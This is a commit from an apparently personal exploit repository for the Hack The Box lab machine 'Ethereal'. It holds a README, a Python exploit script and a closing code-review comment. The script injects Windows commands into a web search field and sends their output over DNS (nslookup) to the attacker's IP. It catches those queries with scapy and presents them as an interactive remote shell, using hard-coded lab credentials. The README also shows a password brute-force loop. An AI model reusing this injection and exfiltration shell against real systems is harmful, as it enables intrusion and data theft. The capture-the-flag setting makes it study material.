Commit 6b8492d4 authored by 0xdf's avatar 0xdf

ethereal

parent 309037a4
## Challenge
[Ethereal](https://www.hackthebox.eu/home/machines/profile/157) from Hackthebox.eu
## ethereal_shell.py
### Description
Performs blind injection into webpage, with return comms over DNS. Script uses scapy to listen for and reply to DNS requests generated by the injection.
### Reference
Originally published in blog posts: https://0xdf.gitlab.io/ethereal/3/
### Dependencies
- python scapy
- python cmd
### Usage
```
root@kali:~/hackthebox/ethereal-10.10.10.106# ./ethereal_shell.py
[*] Starting DNS Sniffer on tun0 for target 10.10.10.106.
[*] Logging in and fetching state information.
[+] State information received.
ethereal> dir \
Volume in drive C has no label.
Volume Serial Number is FAD9-1FD5
Directory of c:
07/07/2018 09:57 PM <DIR> Audit
06/30/2018 10:10 PM <DIR> inetpub
06/26/2018 05:51 AM <DIR> Program Files
07/16/2018 08:55 PM <DIR> Program Files (x86)
07/05/2018 09:38 AM <DIR> Users
07/01/2018 09:57 PM <DIR> Windows
0 File(s) 0 bytes
6 Dir(s) 15,403,929,600 bytes free
ethereal> whoami
etherealalan
```
## pbox.bas
### Description
Modified PasswordBox Application which takes a password as the first argument. If the password is good, it prints a message and returns 0. Else, it returns 1.
### Reference
Originally published in blog posts: https://0xdf.gitlab.io/ethereal/2/
### Usage
```
root@kali# fbc -lang deprecated pbox.bas
root@kali# time for pass in $(cat /usr/share/seclists/Passwords/darkweb2017-top1000.txt); do ./pbox $pass; done
Password Found: password
real 0m5.808s
user 0m1.593s
sys 0m1.096s
```
#!/usr/bin/env python3
import requests
import sys
import time
from bs4 import BeautifulSoup
from cmd import Cmd
from requests.auth import HTTPBasicAuth
from scapy.all import *
from threading import Thread
kill_domain = "0xdf.0xdf."
class dns_sniff(Thread):
def __init__(self, interface='tun0', target_ip='10.10.10.106'):
super().__init__()
self.interface = interface
self.target_ip = target_ip
def run(self):
print(f"[*] Starting DNS Sniffer on {self.interface} for target {self.target_ip}.")
sniff(iface=self.interface, filter=f"src host {self.target_ip} and udp port 53",
prn=self.parse_packet, stop_filter=lambda p: p.haslayer(DNS) and
p.getlayer(DNS).qd.qname.decode('utf-8') == kill_domain)
print(f"[*] Received kill packet. Shutting down sniffer thread.")
def parse_packet(self, p):
if p.haslayer(DNS) and p.getlayer(DNS).qd.qtype == 1:
domain = p.getlayer(DNS).qd.qname.decode('utf-8')
if domain == kill_domain: return
print(domain[1:-2].replace('X.Q',' ').strip())
reply = IP(dst=p[IP].src)/UDP(dport=p[UDP].sport, sport=53)/DNS(id=p[DNS].id,
ancount=1, an=DNSRR(rrname=p[DNSQR].qname, rdata='127.0.0.1')/DNSRR(rrname=domain,
rdata='127.0.0.1'))
send(reply, verbose=0, iface=self.interface)
class Terminal(Cmd):
prompt = "ethereal> "
def __init__(self, proxy=None):
super().__init__()
self.proxy = proxy or {}
self.auth = HTTPBasicAuth('alan','!C414m17y57r1k3s4g41n!')
self.do_login()
self.fail_count = 0
def do_login(self, args=''):
print("[*] Logging in and fetching state information.")
resp = requests.get('http://ethereal.htb:8080/', auth=self.auth, proxies=self.proxy)
soup = BeautifulSoup(resp.text, 'html.parser')
self.view_state = soup.find("input", id="__VIEWSTATE").get('value')
self.view_state_gen = soup.find("input", id="__VIEWSTATEGENERATOR").get('value')
self.event_val = soup.find("input", id="__EVENTVALIDATION").get('value')
print("[+] State information received.")
def send_post(self, search):
data = {'__VIEWSTATE': self.view_state,
'__VIEWSTATEGENERATOR': self.view_state_gen,
'__EVENTVALIDATION': self.event_val,
'search': search,
'ctl02': ''}
try:
start = time.time()
resp = requests.post('http://ethereal.htb:8080/',
proxies=self.proxy,
data = data,
auth = self.auth,
timeout=120)
if resp.status_code == 500 and time.time() - start < 30:
print("[-] Unable to connect to Ethereal\n[*] Running login")
self.do_login()
print("[*] Try running the command again.")
except requests.exceptions.Timeout:
pass
def do_exit(self, args=''):
print("[*] Sending kill request.")
self.send_post(f'& nslookup {kill_domain} 10.10.14.14')
sys.exit()
def default(self, args):
command = f'''& (FOR /F "tokens=1-26" %a IN ('{args}') DO ( nslookup "Q%aX.Q%bX.Q%cX.Q%dX.Q%eX.Q%fX.Q%gX.Q%hX.Q%iX.Q%jX.Q%kX.Q%lX.Q%mX.Q%nX.Q%oX.Q%pX.Q%qX.Q%rX.Q%sX.Q%tX.Q%uX.Q%vX.Q%wX.Q%xX.Q%yX.Q%zX" 10.10.14.14 ))'''
self.send_post(command)
def do_quiet(self, args):
command = f'& ( {args} )'
self.send_post(command)
#dns = dns_sniff(interface='eth0', target_ip='10.1.1.153')
dns = dns_sniff()
dns.start()
term = Terminal(proxy={"http": "http://127.0.0.1:8080"})
try:
term.cmdloop()
except KeyboardInterrupt:
term.do_exit()
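Review bot: `send_post` swallows `requests.exceptions.Timeout` with a bare `pass`, so a request that runs into the 120 s timeout produces no output, and `do_exit` then continues to `sys.exit()` as if the kill request had been delivered; because `dns_sniff` is a non-daemon `Thread`, interpreter shutdown will then wait on a sniffer whose stop condition may never be met. At minimum report the failure in the handler, e.g. `except requests.exceptions.Timeout: print("[-] Request timed out")`, and set `self.daemon = True` in `dns_sniff.__init__` so that exiting the shell cannot hang the process. Separately, `self.fail_count = 0` in `Terminal.__init__` is assigned only after `self.do_login()` has already run and is never read anywhere in the file, and the credentials, target host and callback address are repeated as string literals across `__init__`, `do_login`, `send_post`, `do_exit` and `default`; hoisting them into named constants next to `kill_domain` would make the script easier to read and change. Neither class nor any method carries a docstring; a one-line purpose on `dns_sniff` (sniffs DNS queries from `target_ip` and answers each with an A record) and on `Terminal` (a `Cmd` shell whose commands all go through `send_post`) would help a reader.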